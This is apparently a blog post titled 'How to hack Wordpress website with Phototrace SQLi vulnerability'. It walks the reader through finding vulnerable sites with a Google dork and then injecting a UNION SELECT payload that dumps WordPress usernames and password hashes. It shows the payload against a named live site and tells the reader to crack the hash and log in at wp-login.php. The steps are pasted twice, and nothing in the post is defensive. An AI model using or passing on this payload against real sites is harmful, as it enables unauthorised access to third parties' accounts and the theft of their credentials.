Hi here i tell you how to hack wordpress site with easy way i will use exploit to hack sites i saw lots of Messages that say "hey help can anyone can tell me how to hackwordpress" and it's an easy way with exploit ?
First we search with this in google to find sitesinurl:"wp-content/plugins/photoracer/viewimg.php?id="
see the Result :-
![[Image: asdmr.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uqCyZcYOzT06LWZKUBzXLcTDXsATmA_MQrEBlKT1SegKetA2SdtYrSieGt8IdSbgTYUrfHR_JACgTQgbubR2XFooXMx4ne28ZfFsbxsRsKYBV5L7Q=s0-d)
and i'm gonna test 1 of them for ex this find in google
we are going to add the exploit : this is the exploit
/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
and the site look like this
http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
now you can see the user and pass :D ! Just crack the hash and it's done
The admin panel is
First we search with this in google to find sitesinurl:"wp-content/plugins/photoracer/viewimg.php?id="
see the Result :-
and i'm gonna test 1 of them for ex this find in google
http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2
we are going to add the exploit : this is the exploit
/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
and the site look like this
http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
now you can see the user and pass :D ! Just crack the hash and it's done
The admin panel is
http://Site/wp-login.php
Labels:
Sql injections,
Website hacking
Previous Article
Responses
0 Respones to "How to hack Wordpress website with Phototrace SQLi vulnerability"
Post a Comment